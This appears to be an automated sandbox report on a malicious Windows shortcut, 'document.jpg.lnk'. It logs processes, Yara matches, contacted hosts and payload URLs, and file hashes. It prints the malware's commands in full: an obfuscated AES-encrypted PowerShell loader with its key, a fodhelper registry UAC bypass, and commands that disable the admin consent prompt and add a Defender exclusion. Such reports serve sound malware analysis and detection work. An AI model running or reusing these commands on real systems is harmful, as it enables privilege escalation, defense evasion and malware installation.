Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $waulzkw = 'aaaaaaaaaaaaaaaaaaaaac7jt7k2fpd87clirj9isnhddppfvzatppoiatytldflieew9wcm5gznag730ovvdvcx2w3yrhgvqgbwqrix1uuazcugn8esccvcts0qichjyeddbgezilsxr1p4ogmfx28mlt4honstx3p9ixj2nvrwlwviigsbkcc8iw0igrimyczjnavpn0behsv1pbpa/uspan1mrqr7oiuaxcd7so8vyolommuygb6txkck2eafrqc5jziy/b6l+tskfr2tajtbwnesaj3v0pjwpwc7bictgblifj7ffrqof+y9hdbpb2wr45/goyndklb3gybsxasmw0gcitx/38zqgjlyitpzhemmpt+qkripz1puuoqtq3nrq1gr4iptsyzjt1lo6zqoaasoq8daa1tjjb7lbpmbwa3azu+dgchrt5aoqjteagznmzrmcilcgnktqe+ocr9lzvgwxk5hb/lmb015dusif5fwn3ou7fghcpitfamjx9smk+7wdbeexnd3poufjec78eetgmhnakodzs3k7xhbhgkznwx/uxit61u5sbycoqz60ethpxku00sz3thilgs9d1c76rdtxy5pkhajfhbjszfg80uui2o77utg8n5alsamooqysrdws3aobsxtyzbowd+w4uk5cfosyucr4jqauwarcyt2yj1jhskxaenoo7xknelgvpic8fxgevyzn0ezpbt7kyo3xwbvhwc4jvbl2dfzv8pijhgkvzt7v+n53fglw52t/+lurhoactx1trlls7utkgjb0nsq3uzudizuyvyyzkqypce2i/xrdylfwosxnkknvlx+dwp7awedhlkuengn8jrddrnio8h0jm1lzdjzjxvzoffize+1vykn81iecz8rcfc4ivti1jw4wiww3yhcvw4cjfyde3m3zlsy5ripw40/q+pjw19tnqarsg9cr1uqblgjrowqx1l3dhkcpz4p8rtapign+rjdvugllvr/i6qn7cyct+pbs/fchufvvsv9tgwy8aehifovjntzppnxk8ccizq04mlje25/iuvy58geyi3otgbz5yigm9ptdzmzsygthr7tva48jutpfloqfedubser9eczvpadnlxpbm1iy4babcjk2rhn6gxh42fbzckycwcjrnrtwukgwa+e6q7hlwijvoitmnipzdjlw68tw2ef4zsgggws96009c414dcismzum65niiko+izlbz/skb95+1nnptx504n85rpdq23vt8viofrasfzbit0znw6itlwc+uyta0+lxrdu+lu68zfh8i7dyqscezg5zhxyydrf0vewxgzz12vi4zvnbueeugcimkmfv4d+ty6xxvtbdu5yp6lc4j6k1ga54gkeaghfe2tkdf1ymxwpvwiu/jti3ydo8qafjyhi3wmvpzqwxec4ohwbohwszxubjqhzdr1vbkp0zczx7ftjqxgof9o+qh9twlcec31cfcsddl9zi7o00jr13e0p0ndnpyfnuzsw9d4giern9ityfrsbaztgjl/uxj4plm10ktan6++xcgmfn5jkinzjpbfluktinrvzmkf/k6rfprpoivdovn4j6xzeybr5wjvy2tzrm/un2hd5d91ysypzyoqifwcnre4grze79qsa6te4cuut+6dpmn0in39thcfpvhq8+br8tufxfodjiuj8dafjgkmaz07ey8a/nljeh7zxjjhramizosky+t+5xbiik7nqs4brt/xcat15oq/nqnt4mewgzj62hcjcrd5/q9mr0p4lvmtvjc546huzxrturjqgbqa7giknn7ryz3ghsuet340egqsu/2vjo7fdrl7knphvbnive5+ji1/d0zedislwnyouznxv0pqrif/z5cwwqwjuwb9qppheumuldmydfaq/evwpypyfrwhri00g3frr+tjqiqi7yiw8nlui8ocg7pey1ffnpx8pytoo1vswttjjoitkekmyuak/selhgwidlsrc72vdqellmy4k5pbis3vzaofa7caupldh';$ogscjgji = 'skphrvl2tnv5dfntyw5ddhvybgrpqk5qandwrlpou0o=';$bwerijm = new-object 'system.security.cryptography.aesmanaged';$bwerijm.mode = [system.security.cryptography.ciphermode]::ecb;$bwerijm.padding = [system.security.cryptography.paddingmode]::zeros;$bwerijm.blocksize = 128;$bwerijm.keysize = 256;$bwerijm.key = [system.convert]::frombase64string($ogscjgji);$ffimt = [system.convert]::frombase64string($waulzkw);$dphrhabw = $ffimt[0..15];$bwerijm.iv = $dphrhabw;$vvefzcbje = $bwerijm.createdecryptor();$qfkmuzafd = $vvefzcbje.transformfinalblock($ffimt, 16, $ffimt.length - 16);$bwerijm.dispose();$fdicvmkx = new-object system.io.memorystream( , $qfkmuzafd );$hebjfzmz = new-object system.io.memorystream;$bijbqdkjw = new-object system.io.compression.gzipstream $fdicvmkx, ([io.compressi	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -ep unrestricted -nop set-itemproperty -path registry::hkey_local_machine\software\microsoft\windows\currentversion\policies\system -name consentpromptbehavioradmin -value 0;add-mppreference -exclusionpath c:\users\user\appdata\roaming;

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 51.2.tiago.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.0.tiago.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3217790576.000000000107A000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000000.2377625972.000000000107A000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tiago.exe PID: 3944, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\tiago.exe, type: DROPPED

IP	Domain	Country	ASN	ASN Name	Malicious
194.190.152.246	urler.site	Russian Federation	41615	RSHB-ASRU	false
194.190.152.129	sensor.fun	Russian Federation	41615	RSHB-ASRU	false
91.92.248.36	unknown	Bulgaria	34368	THEZONEBG	true

Name	Malicious	Antivirus Detection	Reputation
http://sensor.fun/tiago.exe	false	Avira URL Cloud: safe	unknown
http://urler.site/document.jpg	false	Avira URL Cloud: safe	unknown
http://91.92.248.36/Downloads/config.exe	true	Avira URL Cloud: safe	unknown

ID:	1391084
Product:	CloudBasic
Start time:	20:43:06
Start date:	12.02.2024
Sample:	document.jpg.lnk
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	aa17c1186359a1ff75f4c53531de4b40
SHA1:	726d59562bf9c5530706337181c995aa7aa7df56
SHA256:	043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952
Filetype:	Windows Shortcut (20020/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	34A6EC2526AC08F8F4C3DCE9D065F60B	06519FC0EAFDCEDAE33FFDE2D24C760733A989F8	EC4E118DCE4BC1106B708A913DAB03D7A02F007C851E535C19FAF2E626ECF7BB
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x827a5401, page size 16384, DirtyShutdown, Windows version 10.0	590D5BCB9ADE7247293A0628C56D4385	6C463D1DDE86D4FE2F0249B0620BF7634556B775	F489D71494567D03520EAF2E09FEADB42A86BAE980928AC7FDBC61556719E01F
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	2946A75632464D0DB7DD574660E81E49	2FD9C72F764B4A5C521C89FC0314EC0BC39DBC33	686E656F86A09267673354B645D522C413DD3550AEB977594FA84C5F3C4D9CF7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\config[1].exe	data	05C7CFA490DF0C2FB8B8A5F03F38C01D	DEE0D4D5204830393BFA95F029FACAA477FB3268	7DD37D4066D9387B593BC7D4F65AE60632D0893159261F2543228F911CA17A1E
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	2C1F0CFC291B5E6F7C8A196A9A0C3012	52CE595ABAAC12983844E2F895EACBA1C0A3285E	83B021242ACFC79C2A022E3A5E8B8E747FEB5300DC95B4BFC1321196818B1BD6
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	668B6123F1F13455B667C2673746CAD0	2EE32C8899CA1AB35C8BD71061ABB12D72790736	EF4B7EFAF67545E3AF785B4D28A4A334AB52EE17F3B741811BDC398C66F3D30B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zj5igx1.gwe.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40241sdr.dcg.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiw1jb0v.vir.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2oyqq5z.bt0.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmbx53cn.kow.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erisu5kg.heb.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etjy0v1k.qiu.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpafpudm.yfu.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0cgtfcj.m11.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
